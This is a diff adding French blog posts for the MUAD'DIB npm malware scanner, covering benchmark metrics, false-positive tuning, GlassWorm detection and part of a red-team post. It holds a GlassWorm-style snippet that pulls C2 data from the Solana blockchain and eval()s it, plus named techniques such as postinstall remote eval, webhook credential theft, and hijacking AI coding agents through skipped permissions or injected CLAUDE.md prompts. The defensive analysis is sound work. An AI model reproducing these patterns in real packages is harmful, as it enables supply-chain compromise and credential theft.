### PR TITLE
v2.9.10  sandbox INCONCLUSIVE + IOC wildcard + evaluate + blog

### DIFF
--- a/docs/blog/benchmark-17k.html
+++ b/docs/blog/benchmark-17k.html
@@ -1,0 +1,131 @@
+<!DOCTYPE html>
+<html lang="fr">
+<head>
+  <meta charset="utf-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1">
+  <title>92.5% de detection sur 17 000 malwares reels — MUAD'DIB</title>
+  <meta name="description" content="Benchmark sur le dataset Datadog : 14 587 packages in-scope, 13 486 detectes, 9 heures de scan.">
+  <link rel="stylesheet" href="../style.css">
+  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/styles/github-dark.min.css">
+  <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/highlight.min.js"></script>
+  <script>hljs.highlightAll();</script>
+</head>
+<body>
+
+<nav>
+  <a href="../" class="site-name">muad-dib</a>
+  <a href="../">accueil</a>
+  <a href="./">blog</a>
+  <a href="https://github.com/DNSZLSK/muad-dib" target="_blank" rel="noopener">github</a>
+  <a href="https://www.npmjs.com/package/muaddib-scanner" target="_blank" rel="noopener">npm</a>
+</nav>
+
+<main>
+  <a href="./" class="back-link">&larr; Blog</a>
+
+  <article>
+    <div class="article-meta">
+      <h1>92.5% de detection sur 17 000 malwares reels</h1>
+      <span class="date">2026-03-20</span>
+      <div class="tags">
+        <span class="tag">benchmark</span>
+        <span class="tag">datadog</span>
+        <span class="tag">metriques</span>
+      </div>
+    </div>
+
+    <div class="article-content">
+
+      <p>Nos metriques internes (TPR sur 49 samples, ADR sur 107 adversariaux) mesurent la precision sur des echantillons choisis. Mais la vraie question est : <strong>que se passe-t-il sur 17 000 malwares reels, en conditions sauvages ?</strong></p>
+
+      <p>Le dataset Datadog Security Labs contient 17 922 packages npm confirmes malveillants. On les a tous scannes.</p>
+
+      <h2>Le setup</h2>
+
+      <p>Execution sur VPS. 17 922 packages, chacun telecharge, extrait, et scanne avec les 14 scanners. Temps total : <strong>32 141 secondes (~9 heures)</strong>. Zero erreur.</p>
+
+      <p>Sur les 17 922 packages :</p>
+      <ul>
+        <li><strong>3 335 skips</strong> — packages sans fichiers JavaScript (binaires purs, assets, packages vides). Exclus du calcul.</li>
+        <li><strong>14 587 in-scope</strong> — packages avec du code JavaScript analysable</li>
+      </ul>
+
+      <h2>Les resultats</h2>
+
+      <table>
+        <tr><th>Metrique</th><th>Valeur</th></tr>
+        <tr><td>Wild TPR global</td><td><strong>92.5%</strong> (13 486 / 14 587)</td></tr>
+        <tr><td>compromised_lib</td><td><strong>97.8%</strong> (904 / 924)</td></tr>
+        <tr><td>malicious_intent</td><td><strong>92.1%</strong> (12 582 / 13 663)</td></tr>
+        <tr><td>Erreurs</td><td>0</td></tr>
+      </table>
+
+      <p>La distinction <code>compromised_lib</code> vs <code>malicious_intent</code> est importante. Les <code>compromised_lib</code> sont des packages legitimes dont une version specifique a ete compromisee (pattern ua-parser-js, event-stream). Les <code>malicious_intent</code> sont des packages crees avec l'intention de nuire (typosquats, droppers, exfiltrators). MUAD'DIB detecte mieux les compromissions (97.8%) car elles laissent plus de traces dans le diff entre versions.</p>
+
+      <h2>Distribution des scores</h2>
+
+      <table>
+        <tr><th>Score</th><th>Packages</th><th>Interpretation</th></tr>
+        <tr><td>0</td><td>1 101</td><td>Non detectes (aucune menace trouvee)</td></tr>
+        <tr><td>1-9</td><td>2 488</td><td>Signaux faibles, sous le seuil</td></tr>
+        <tr><td>10-24</td><td>2 125</td><td>Zone grise (seuil standard = 20)</td></tr>
+        <tr><td>25-49</td><td>4 900</td><td>Detectes avec confiance moderee</td></tr>
+        <tr><td>50-74</td><td>1 527</td><td>Detectes avec haute confiance</td></tr>
+        <tr><td>75-100</td><td>2 446</td><td>Detectes avec tres haute confiance</td></tr>
+      </table>
+
+      <p>La majorite des detections (8 873 packages, 61%) ont un score >= 25. Ce n'est pas du scoring marginal — ce sont des detections claires.</p>
+
+      <h2>Les MISS : qu'est-ce qu'on rate ?</h2>
+
+      <p>1 101 packages avec score 0 et 0 menaces. Analyse des causes :</p>
+
+      <ul>
+        <li><strong><code>@react-native-aria/*</code></strong> — Packages marques <code>compromised_lib</code> dans le dataset Datadog, mais sans code JS malveillant detectable statiquement. La compromission est au niveau du registre/maintainer, pas du code source.</li>
+        <li><strong><code>xrpl</code></strong> — Bibliotheque crypto legitime dont des versions specifiques ont ete compromisees. Le code malveillant a ete injecte via un processus de build, pas directement dans les sources.</li>
+        <li><strong>Packages sans code</strong> — Certains packages ne contiennent que des fichiers de configuration ou des assets. Aucun code a analyser = aucune detection possible.</li>
+      </ul>
+
+      <p>Ces MISS sont coherents avec les limites connues de l'analyse statique : si le code malveillant n'est pas dans les sources scannees (build-time injection, registre compromis, binaires pre-compiles), un scanner statique ne peut pas le detecter.</p>
+
+      <h2>Le role des compound rules</h2>
+
+      <p>Avant les compound rules (v2.9.2), le Wild TPR estime etait autour de ~88%. Le gap de ~4.5% a ete comble par 6 regles de scoring compose :</p>
+
+      <table>
+        <tr><th>Compound</th><th>Composants</th></tr>
+        <tr><td>crypto_staged_payload</td><td>staged_binary_payload + crypto_decipher</td></tr>
+        <tr><td>lifecycle_typosquat</td><td>lifecycle_script + typosquat_detected</td></tr>
+        <tr><td>lifecycle_inline_exec</td><td>lifecycle_script + node_inline_exec</td></tr>
+        <tr><td>lifecycle_remote_require</td><td>lifecycle_script + network_require</td></tr>
+      </table>
+
+      <p>Ces combinaisons n'apparaissent <strong>jamais</strong> dans les 529 packages benins du dataset de reference. Un package avec un script lifecycle ET un nom typosquat est toujours malveillant. Un script lifecycle qui fait <code>require('https')</code> aussi.</p>
+
+      <h2>Comparaison avec les metriques internes</h2>
+
+      <table>
+        <tr><th>Metrique</th><th>Interne</th><th>Wild (Datadog)</th></tr>
+        <tr><td>TPR</td><td>93.9% (46/49)</td><td>92.5% (13 486/14 587)</td></tr>
+        <tr><td>ADR</td><td>96.3% (103/107)</td><td>—</td></tr>
+        <tr><td>compromised_lib</td><td>—</td><td>97.8%</td></tr>
+      </table>
+
+      <p>Les metriques internes et sauvages convergent (~93% vs ~92.5%). C'est un bon signe : le ground truth de 49 samples et les 107 adversariaux ne sont pas sur-ajustes. La performance generalise au-dela du dataset de developpement.</p>
+
+      <h2>Lecon</h2>
+
+      <p>Un benchmark sur 17K packages reels ne ment pas. Les metriques internes sur 49+107 echantillons etaient honnetes — la performance sauvage le confirme. Mais le benchmark revele aussi les limites structurelles de l'analyse statique : les compromissions build-time, les injections registre, et les binaires pre-compiles restent hors de portee.</p>
+
+      <p>92.5% n'est pas 100%. Les 7.5% restants sont un rappel que la detection statique est une couche de defense, pas la seule.</p>
+
+    </div>
+  </article>
+</main>
+
+<footer>
+  MUAD'DIB / DNSZLSK / <a href="https://github.com/DNSZLSK/muad-dib" target="_blank" rel="noopener">source</a>
+</footer>
+
+</body>
+</html>

--- a/docs/blog/glassworm-detection.html
+++ b/docs/blog/glassworm-detection.html
@@ -1,0 +1,149 @@
+<!DOCTYPE html>
+<html lang="fr">
+<head>
+  <meta charset="utf-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1">
+  <title>GlassWorm : Unicode invisible et C2 blockchain Solana — MUAD'DIB</title>
+  <meta name="description" content="Detection de la campagne GlassWorm : 433 packages npm compromis utilisant des caracteres Unicode invisibles et un C2 via la blockchain Solana.">
+  <link rel="stylesheet" href="../style.css">
+  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/styles/github-dark.min.css">
+  <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/highlight.min.js"></script>
+  <script>hljs.highlightAll();</script>
+</head>
+<body>
+
+<nav>
+  <a href="../" class="site-name">muad-dib</a>
+  <a href="../">accueil</a>
+  <a href="./">blog</a>
+  <a href="https://github.com/DNSZLSK/muad-dib" target="_blank" rel="noopener">github</a>
+  <a href="https://www.npmjs.com/package/muaddib-scanner" target="_blank" rel="noopener">npm</a>
+</nav>
+
+<main>
+  <a href="./" class="back-link">&larr; Blog</a>
+
+  <article>
+    <div class="article-meta">
+      <h1>GlassWorm : Unicode invisible et C2 blockchain Solana</h1>
+      <span class="date">2026-03-18</span>
+      <div class="tags">
+        <span class="tag">detection</span>
+        <span class="tag">glassworm</span>
+        <span class="tag">unicode</span>
+        <span class="tag">solana</span>
+      </div>
+    </div>
+
+    <div class="article-content">
+
+      <p>Mars 2026. La campagne GlassWorm compromet <strong>433+ packages npm</strong> avec deux techniques qu'on n'avait jamais vues ensemble : du code cache dans des caracteres Unicode invisibles, et un serveur C2 stocke sur la blockchain Solana.</p>
+
+      <p>Voici comment on l'a detectee, et les 4 nouvelles regles qu'on a du ecrire.</p>
+
+      <h2>Le probleme : du code invisible</h2>
+
+      <p>Le premier vecteur est elegant dans sa simplicite. Le fichier JavaScript semble vide ou inoffensif a l'oeil nu. Mais il contient des dizaines de caracteres Unicode <strong>zero-width</strong> — des caracteres qui ne s'affichent pas mais qui existent bien dans le fichier.</p>
+
+      <p>Les caracteres utilises :</p>
+      <ul>
+        <li><strong>Zero-width</strong> : U+200B (space), U+200C (non-joiner), U+200D (joiner)</li>
+        <li><strong>BOM hors position 0</strong> : U+FEFF — le Byte Order Mark est normal en debut de fichier, suspect ailleurs</li>
+        <li><strong>Word joiner</strong> : U+2060, <strong>Mongolian vowel separator</strong> : U+180E</li>
+        <li><strong>Variation selectors</strong> : U+FE00-FE0F et U+E0100-E01EF</li>
+        <li><strong>Tag characters</strong> : U+E0001-U+E007F</li>
+      </ul>
+
+      <p>Le payload est encode dans ces caracteres. Un decoder utilise <code>.codePointAt()</code> combine avec des offsets <code>0xFE00</code> ou <code>0xE0100</code> pour reconstruire le code executable.</p>
+
+      <h2>Le deuxieme vecteur : C2 blockchain</h2>
+
+      <p>Les serveurs C2 classiques ont un defaut fatal pour l'attaquant : on peut les takedown. Un nom de domaine se saisit, une IP se bloque. La blockchain, non.</p>
+
+      <p>GlassWorm utilise <code>@solana/web3.js</code> pour lire les instructions de commande directement depuis des transactions Solana :</p>
+
+      <pre><code class="language-javascript">import { Connection } from '@solana/web3.js';
+
+const conn = new Connection('https://api.mainnet-beta.solana.com');
+const sigs = await conn.getSignaturesForAddress(c2Address);
+const tx = await conn.getTransaction(sigs[0].signature);
+// tx.data contient les instructions C2
+eval(decode(tx.data));</code></pre>
+
+      <p>Le serveur C2 est la blockchain elle-meme. Immuable, decentralise, impossible a saisir. Les methodes surveillees : <code>getSignaturesForAddress</code>, <code>getTransaction</code>, <code>getParsedTransaction</code>.</p>
+
+      <h2>Les 4 nouvelles regles</h2>
+
+      <h3>OBF-003 — unicode_invisible_injection</h3>
+
+      <p>Detection des caracteres Unicode invisibles dans le code source. La fonction <code>countInvisibleUnicode()</code> dans <code>obfuscation.js</code> compte les caracteres zero-width, BOM hors position, variation selectors, et tag characters. Seuil : <strong>>= 3 caracteres invisibles</strong> dans un fichier = alerte HIGH.</p>
+
+      <pre><code class="language-javascript">function countInvisibleUnicode(content) {
+  let count = 0;
+  for (let i = 0; i < content.length; i++) {
+    const cp = content.codePointAt(i);
+    if (cp === 0x200B || cp === 0x200C || cp === 0x200D) count++;
+    if (cp === 0xFEFF && i > 0) count++;  // BOM hors position 0
+    if (cp === 0x2060 || cp === 0x180E) count++;
+    if (cp >= 0xFE00 && cp <= 0xFE0F) count++;
+    if (cp >= 0xE0100 && cp <= 0xE01EF) count++;
+    if (cp >= 0xE0001 && cp <= 0xE007F) count++;
+    if (cp > 0xFFFF) i++;  // supplementary plane
+  }
+  return count;
+}</code></pre>
+
+      <p>Pourquoi le seuil de 3 ? Un BOM isole ou un zero-width joiner dans du texte internationalise est normal. Trois ou plus dans du code JavaScript ne l'est jamais.</p>
+
+      <h3>AST-053 — unicode_variation_decoder</h3>
+
+      <p>Detection du pattern de decodage : <code>.codePointAt()</code> combine avec des constantes <code>0xFE00</code> ou <code>0xE0100</code> dans le meme fichier. Ce compound est specifique au decoder GlassWorm.</p>
+
+      <h3>AST-054 — blockchain_c2_resolution</h3>
+
+      <p>Detection de l'import <code>@solana/web3.js</code> combine avec les methodes C2 (<code>getSignaturesForAddress</code>, <code>getTransaction</code>, <code>getParsedTransaction</code>). Severite adaptative :</p>
+      <ul>
+        <li><strong>CRITICAL</strong> si combine avec <code>eval()</code> ou <code>exec()</code> — c'est l'execution du payload C2</li>
+        <li><strong>HIGH</strong> sinon — l'import Solana avec ces methodes est suspect mais pourrait etre un usage DeFi legitime</li>
+      </ul>
+
+      <h3>AST-055 — blockchain_rpc_endpoint</h3>
+
+      <p>Detection des endpoints RPC hardcodes vers Solana (<code>api.mainnet-beta.solana.com</code>), Infura, ou Ankr. Severite MEDIUM — c'est un signal faible qui contribue au score composite.</p>
+
+      <h2>IOC et infrastructure</h2>
+
+      <p>En complement des regles heuristiques, ajout d'IOC specifiques GlassWorm :</p>
+      <ul>
+        <li><strong>6 IPs C2</strong> ajoutees a <code>SUSPICIOUS_DOMAINS_HIGH</code></li>
+        <li><strong>8 packages compromis</strong> ajoutes aux IOC builtin (<code>builtin.yaml</code>)</li>
+        <li><strong>4 marqueurs</strong>, 2 fichiers de signature, 1 hash</li>
+      </ul>
+
+      <h2>Resultats</h2>
+
+      <table>
+        <tr><th>Metrique</th><th>Avant</th><th>Apres</th></tr>
+        <tr><td>Regles</td><td>143</td><td><strong>147</strong> (+4)</td></tr>
+        <tr><td>Tests</td><td>2266</td><td><strong>2300</strong> (+34)</td></tr>
+        <tr><td>FPR</td><td>12.9%</td><td><strong>12.9%</strong> (inchange)</td></tr>
+      </table>
+
+      <p>Zero faux positif ajoute. Les packages Solana legitimes (wallets, DeFi) n'utilisent pas <code>eval()</code> apres <code>getTransaction()</code>, et ne contiennent pas de caracteres Unicode invisibles.</p>
+
+      <h2>Lecon</h2>
+
+      <p>GlassWorm montre que les attaquants innovent sur deux fronts simultanement : l'obfuscation (Unicode invisible) et l'infrastructure (blockchain C2). La detection doit couvrir les deux. Les IOC seuls ne suffisent pas — il faut des heuristiques comportementales pour detecter les <em>techniques</em>, pas juste les <em>instances</em>.</p>
+
+      <p>La blockchain comme C2 est un changement de paradigme. On ne peut plus compter sur le takedown de l'infrastructure pour stopper une campagne. La detection cote client devient la seule ligne de defense.</p>
+
+    </div>
+  </article>
+</main>
+
+<footer>
+  MUAD'DIB / DNSZLSK / <a href="https://github.com/DNSZLSK/muad-dib" target="_blank" rel="noopener">source</a>
+</footer>
+
+</body>
+</html>

--- a/docs/blog/index.html
+++ b/docs/blog/index.html
@@ -1,0 +1,64 @@
+<!DOCTYPE html>
+<html lang="fr">
+<head>
+  <meta charset="utf-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1">
+  <title>Blog / MUAD'DIB</title>
+  <meta name="description" content="Articles techniques sur la detection de menaces supply-chain npm et PyPI.">
+  <link rel="stylesheet" href="../style.css">
+</head>
+<body>
+
+<nav>
+  <a href="../" class="site-name">muad-dib</a>
+  <a href="../">accueil</a>
+  <a href="./" class="active">blog</a>
+  <a href="https://github.com/DNSZLSK/muad-dib" target="_blank" rel="noopener">github</a>
+  <a href="https://www.npmjs.com/package/muaddib-scanner" target="_blank" rel="noopener">npm</a>
+</nav>
+
+<h1>Blog</h1>
+<p>Notes de terrain sur la detection de menaces supply-chain.</p>
+
+<hr>
+
+<ul class="post-list">
+
+  <li>
+    <span class="post-title"><a href="benchmark-17k.html">92.5% de detection sur 17 000 malwares reels</a></span>
+    <br><span class="post-date">2026-03-20</span> <span class="tags"><span class="tag">benchmark</span> <span class="tag">datadog</span> <span class="tag">metriques</span></span>
+    <p class="post-summary">9 heures de benchmark sur le dataset Datadog. 14 587 packages in-scope, 13 486 detectes.</p>
+  </li>
+
+  <li>
+    <span class="post-title"><a href="red-team-blue-team.html">Red Team vs Blue Team : 107 echantillons adversariaux en 7 campagnes</a></span>
+    <br><span class="post-date">2026-03-20</span> <span class="tags"><span class="tag">red-team</span> <span class="tag">adversarial</span> <span class="tag">methodologie</span></span>
+    <p class="post-summary">Comment tester un scanner de securite quand l'attaquant connait les regles.</p>
+  </li>
+
+  <li>
+    <span class="post-title"><a href="glassworm-detection.html">GlassWorm : Unicode invisible et C2 blockchain Solana</a></span>
+    <br><span class="post-date">2026-03-18</span> <span class="tags"><span class="tag">detection</span> <span class="tag">glassworm</span> <span class="tag">unicode</span> <span class="tag">solana</span></span>
+    <p class="post-summary">433 packages npm compromis, du code cache dans des caracteres zero-width, et un C2 sur la blockchain.</p>
+  </li>
+
+  <li>
+    <span class="post-title"><a href="sandbox-time-travel.html">Le sandbox qui voyage dans le temps</a></span>
+    <br><span class="post-date">2026-03-02</span> <span class="tags"><span class="tag">sandbox</span> <span class="tag">time-bomb</span> <span class="tag">evasion</span></span>
+    <p class="post-summary">Quand les malwares attendent 72h avant de voler les credentials, on accelere le temps.</p>
+  </li>
+
+  <li>
+    <span class="post-title"><a href="le-vrai-fpr.html">Le vrai FPR : quand 0% cache la realite</a></span>
+    <br><span class="post-date">2026-02-21</span> <span class="tags"><span class="tag">metriques</span> <span class="tag">faux-positifs</span> <span class="tag">methodologie</span></span>
+    <p class="post-summary">Notre taux de faux positifs etait de 0%. En realite, il etait de 38%.</p>
+  </li>
+
+</ul>
+
+<footer>
+  MUAD'DIB / DNSZLSK / <a href="https://github.com/DNSZLSK/muad-dib" target="_blank" rel="noopener">source</a>
+</footer>
+
+</body>
+</html>

--- a/docs/blog/le-vrai-fpr.html
+++ b/docs/blog/le-vrai-fpr.html
@@ -1,0 +1,165 @@
+<!DOCTYPE html>
+<html lang="fr">
+<head>
+  <meta charset="utf-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1">
+  <title>Le vrai FPR : quand 0% cache la realite — MUAD'DIB</title>
+  <meta name="description" content="Comment on a decouvert que notre taux de faux positifs de 0% etait completement faux, et le parcours de 38% a 7%.">
+  <link rel="stylesheet" href="../style.css">
+  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/styles/github-dark.min.css">
+  <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/highlight.min.js"></script>
+  <script>hljs.highlightAll();</script>
+</head>
+<body>
+
+<nav>
+  <a href="../" class="site-name">muad-dib</a>
+  <a href="../">accueil</a>
+  <a href="./">blog</a>
+  <a href="https://github.com/DNSZLSK/muad-dib" target="_blank" rel="noopener">github</a>
+  <a href="https://www.npmjs.com/package/muaddib-scanner" target="_blank" rel="noopener">npm</a>
+</nav>
+
+<main>
+  <a href="./" class="back-link">&larr; Blog</a>
+
+  <article>
+    <div class="article-meta">
+      <h1>Le vrai FPR : quand 0% cache la realite</h1>
+      <span class="date">2026-02-21</span>
+      <div class="tags">
+        <span class="tag">metriques</span>
+        <span class="tag">faux-positifs</span>
+        <span class="tag">methodologie</span>
+      </div>
+    </div>
+
+    <div class="article-content">
+
+      <p>Pendant des semaines, notre framework d'evaluation affichait fierement : <strong>FPR 0% (0/98)</strong>. Aucun faux positif sur 98 packages npm populaires. On etait satisfaits.</p>
+
+      <p>On avait tort.</p>
+
+      <h2>La decouverte embarrassante</h2>
+
+      <p>En examinant le code de <code>evaluateBenign()</code>, une realite genante est apparue. La fonction creait des repertoires temporaires vides contenant uniquement un <code>package.json</code> avec le nom du package, puis lancait le scanner sur ces repertoires vides.</p>
+
+      <p>Les 14 scanners (AST, dataflow, obfuscation, entropie, etc.) n'avaient litteralement <strong>rien a analyser</strong>. Le 0% ne mesurait que le matching IOC et la detection de typosquatting sur les noms. Pas du tout la capacite du scanner a eviter les faux positifs sur du vrai code source.</p>
+
+      <p>Pendant ce temps, le TPR (ground truth) et l'ADR (adversarial) scannaient de vrais fichiers JavaScript. L'asymetrie etait flagrante : on testait les vrais positifs sur du vrai code, et les faux positifs sur du vide.</p>
+
+      <blockquote>Ne jamais faire confiance a un FPR de 0%. Un scanner de securite qui ne genere aucun faux positif ne scanne probablement rien.</blockquote>
+
+      <h2>La correction : scanner du vrai code</h2>
+
+      <p>Reecriture complete pour telecharger et scanner les vrais tarballs npm. Et les galeres Windows en bonus :</p>
+
+      <ul>
+        <li><code>execFileSync('npm', ...)</code> echoue sur Windows — npm est un wrapper <code>.cmd</code></li>
+        <li><code>tar xzf "C:\path\file.tgz"</code> interprete <code>C:</code> comme un remote host SSH</li>
+        <li>Solution : extracteur tar natif en Node.js (<code>zlib.gunzipSync</code> + parsing des headers tar 512 octets)</li>
+      </ul>
+
+      <h2>Le vrai FPR : 38%</h2>
+
+      <p>Premier test sur 50 packages reels. Resultat brutal :</p>
+
+      <table>
+        <tr><th>Package</th><th>Score</th><th>Cause principale</th></tr>
+        <tr><td>next</td><td>100</td><td>76 dynamic_require, 45 dynamic_import (systeme de plugins)</td></tr>
+        <tr><td>gatsby</td><td>100</td><td>20 dynamic_require, 8 require.cache (HMR)</td></tr>
+        <tr><td>restify</td><td>100</td><td>52 prototype_hook (Request/Response.prototype)</td></tr>
+        <tr><td>htmx.org</td><td>100</td><td>eval pour expressions CSS dynamiques, 5 staged_payload</td></tr>
+        <tr><td>moleculer</td><td>100</td><td>os.hostname + fetch pour metriques Datadog</td></tr>
+      </table>
+
+      <p>Next.js a 76 <code>dynamic_require</code>. Un malware en a 1 ou 2.</p>
+
+      <h2>L'observation cle : volume = legitimite</h2>
+
+      <p>En analysant les 19 faux positifs initiaux, un pattern est apparu : <strong>les packages legitimes produisent des volumes massifs de certains types de menaces, alors que les malwares n'en ont que 1 a 3.</strong></p>
+
+      <p>Un framework est bruyant — il utilise des centaines de patterns qui declenchent les heuristiques. Un malware est furtif — il utilise le minimum de techniques pour atteindre son objectif.</p>
+
+      <h2>Le parcours : 38% &rarr; 7%</h2>
+
+      <h3>Pass 1 — Seuils de volume (38% &rarr; 19.4%)</h3>
+      <ul>
+        <li><code>dynamic_require</code> &gt;10 hits &rarr; tous LOW</li>
+        <li><code>dangerous_call_function</code> &gt;5 hits &rarr; tous LOW</li>
+        <li><code>prototype_hook</code> sur prototypes custom (Request, Response) &rarr; MEDIUM</li>
+        <li><code>require_cache_poison</code> &gt;3 hits &rarr; tous LOW</li>
+      </ul>
+
+      <h3>Pass 2 — Filtrage au scanner (19.4% &rarr; 17.5%)</h3>
+      <ul>
+        <li>Expansion de <code>SAFE_ENV_VARS</code> (+13 variables de config)</li>
+        <li>Fichiers dans <code>dist/</code>, <code>build/</code> &rarr; obfuscation LOW</li>
+        <li>Cap scoring pour <code>prototype_hook</code> MEDIUM en volume</li>
+      </ul>
+
+      <h3>Le changement structurel — Per-file max scoring (17.5% &rarr; 13%)</h3>
+
+      <p>Le levier le plus puissant. Au lieu d'additionner les findings de tous les fichiers :</p>
+
+      <pre><code class="language-text">Ancienne formule :
+  riskScore = min(100, somme(tous_les_findings))
+
+Nouvelle formule :
+  riskScore = min(100, max(scores_par_fichier) + score_package_level)</code></pre>
+
+      <p>Un package n'est suspect que si <strong>au moins un fichier</strong> est suspect. Next.js avec 3162 fichiers .js accumule des findings LOW/MEDIUM partout, mais aucun fichier individuel n'est vraiment suspect.</p>
+
+      <h3>Passes 3-4 — Precision (13% &rarr; 7.4%)</h3>
+      <ul>
+        <li>Categorisation <code>os.platform</code>/<code>os.arch</code> comme telemetrie (pas credentials)</li>
+        <li><code>module_compile</code> count-based downgrade (&gt;3 hits &rarr; LOW)</li>
+        <li>Skip des aliases npm dans les IOC</li>
+        <li>Fichiers <code>.cjs</code>/<code>.mjs</code> &gt;100KB &rarr; bundled output (LOW)</li>
+      </ul>
+
+      <h2>L'analyse par taille</h2>
+
+      <p>Le FPR n'est pas uniforme. Il depend directement de la taille du package :</p>
+
+      <table>
+        <tr><th>Categorie</th><th>Packages</th><th>FPR</th></tr>
+        <tr><td>Petits (&lt;10 fichiers .js)</td><td>290</td><td><strong>6.2%</strong></td></tr>
+        <tr><td>Moyens (10-50 .js)</td><td>135</td><td>11.9%</td></tr>
+        <tr><td>Gros (50-100 .js)</td><td>40</td><td>25.0%</td></tr>
+        <tr><td>Tres gros (100+ .js)</td><td>62</td><td>40.3%</td></tr>
+      </table>
+
+      <p>51% du dataset npm sont des petits packages. Pour un dev typique scannant ses dependances, le FPR effectif est plus proche de 6% que de 13%.</p>
+
+      <h2>Progression complete</h2>
+
+      <table>
+        <tr><th>Version</th><th>FPR</th><th>Correction principale</th></tr>
+        <tr><td>v2.2.7</td><td><strong>38%</strong></td><td>Premier FPR reel (scan de vrais tarballs)</td></tr>
+        <tr><td>v2.2.8</td><td>19.4%</td><td>Seuils de volume par type</td></tr>
+        <tr><td>v2.2.9</td><td>17.5%</td><td>Filtrage scanner-level (env vars, dist/)</td></tr>
+        <tr><td>v2.2.11</td><td>13.1%</td><td>Scoring per-file max</td></tr>
+        <tr><td>v2.3.0</td><td>8.9%</td><td>Telemetrie vs credentials</td></tr>
+        <tr><td>v2.3.1</td><td>7.4%</td><td>Precision heuristique</td></tr>
+        <tr><td>v2.5.8</td><td>6.0%</td><td>IOC wildcard audit</td></tr>
+      </table>
+
+      <p>Aucune de ces corrections n'a cause de regression sur les adversariaux ou le ground truth. Le principe : on downgrade la severite, on ne supprime jamais les findings.</p>
+
+      <h2>Lecon</h2>
+
+      <p>Un scanner qui affiche 0% de faux positifs ment probablement. Le 38% etait embarrassant mais honnete — c'etait la premiere mesure reelle. La suite a montre que la distinction malware/legitime repose souvent sur le <strong>volume</strong> (un malware est furtif) et la <strong>concentration</strong> (un malware agit dans 1-2 fichiers, pas dans 3162).</p>
+
+      <p>La transparence sur les metriques n'est pas optionnelle. Si on avait continue avec le 0% fictif, toutes les decisions d'amelioration auraient ete basees sur une metrique fausse.</p>
+
+    </div>
+  </article>
+</main>
+
+<footer>
+  MUAD'DIB / DNSZLSK / <a href="https://github.com/DNSZLSK/muad-dib" target="_blank" rel="noopener">source</a>
+</footer>
+
+</body>
+</html>

--- a/docs/blog/red-team-blue-team.html
+++ b/docs/blog/red-team-blue-team.html
@@ -1,0 +1,163 @@
+<!DOCTYPE html>
+<html lang="fr">
+<head>
+  <meta charset="utf-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1">
+  <title>Red Team vs Blue Team : 107 echantillons adversariaux — MUAD'DIB</title>
+  <meta name="description" content="7 campagnes adversariales pour tester un scanner supply-chain. 107 echantillons, ADR 96.3%.">
+  <link rel="stylesheet" href="../style.css">
+  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/styles/github-dark.min.css">
+  <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/highlight.min.js"></script>
+  <script>hljs.highlightAll();</script>
+</head>
+<body>
+
+<nav>
+  <a href="../" class="site-name">muad-dib</a>
+  <a href="../">accueil</a>
+  <a href="./">blog</a>
+  <a href="https://github.com/DNSZLSK/muad-dib" target="_blank" rel="noopener">github</a>
+  <a href="https://www.npmjs.com/package/muaddib-scanner" target="_blank" rel="noopener">npm</a>
+</nav>
+
+<main>
+  <a href="./" class="back-link">&larr; Blog</a>
+
+  <article>
+    <div class="article-meta">
+      <h1>Red Team vs Blue Team : 107 echantillons adversariaux en 7 campagnes</h1>
+      <span class="date">2026-03-20</span>
+      <div class="tags">
+        <span class="tag">red-team</span>
+        <span class="tag">adversarial</span>
+        <span class="tag">methodologie</span>
+      </div>
+    </div>
+
+    <div class="article-content">
+
+      <p>Comment tester un scanner de securite quand l'attaquant connait les regles ? On cree les attaques soi-meme, on mesure ce qui passe a travers, et on corrige. 7 campagnes, 107 echantillons, et un score pre-tuning qui raconte l'histoire vraie.</p>
+
+      <h2>La methodologie</h2>
+
+      <p>Le cycle est toujours le meme :</p>
+      <ol>
+        <li><strong>Geler les regles</strong> — aucune modification du scanner</li>
+        <li><strong>Creer les echantillons</strong> — techniques d'evasion basees sur des attaques reelles documentees</li>
+        <li><strong>Scanner avec les regles gelees</strong> — enregistrer les scores bruts</li>
+        <li><strong>Corriger les detections</strong> — ajouter/modifier les regles</li>
+        <li><strong>Verifier zero regression</strong> — les corrections ne doivent casser aucun test existant</li>
+      </ol>
+
+      <p>Le <strong>score pre-tuning</strong> est la metrique la plus honnete. Il mesure la capacite de generalisation sur des patterns jamais vus pendant le developpement.</p>
+
+      <h2>Les 7 campagnes</h2>
+
+      <h3>Vague 1 — Le baseline (20 echantillons)</h3>
+
+      <p>Score pre-tuning : <strong>~14%</strong>. Le scanner ne detectait presque rien. Les patterns de base (<code>require()</code> obfusque, DNS exfiltration, staged payload) passaient a travers. Corrections massives du scanner AST et dataflow. 5 nouvelles regles. Resultat post-tuning : 20/20.</p>
+
+      <h3>Vague 2 — Techniques emergentes (5 echantillons)</h3>
+
+      <p>Score pre-tuning : <strong>0%</strong>. Template literal obfuscation, proxy env intercept, nested payload, dynamic import, websocket exfil — rien n'etait couvert. Le pire score de toutes les campagnes. Resultat post-tuning : 25/25.</p>
+
+      <h3>Vague 3 — Attaques reelles 2025-2026 (5 echantillons)</h3>
+
+      <p>Score pre-tuning : <strong>60%</strong>. Premiere amelioration significative. Les techniques testees :</p>
+      <ul>
+        <li><strong>AI agent weaponization</strong> — invocation de Claude/Gemini avec <code>--dangerously-skip-permissions</code> (pattern s1ngularity/Nx)</li>
+        <li><strong>AI config injection</strong> — injection de prompts dans <code>.cursorrules</code>, <code>CLAUDE.md</code> (pattern ToxicSkills)</li>
+        <li><strong>Zero-deps RDD</strong> — inline <code>https.get</code> + <code>eval()</code> dans postinstall (pattern PhantomRaven)</li>
+        <li><strong>Discord webhook exfil</strong> — credentials vers webhook Discord (pattern Shai-Hulud)</li>
+        <li><strong>Background fork</strong> — preinstall + fork detache + vol de credentials (pattern StepSecurity)</li>
+      </ul>
+
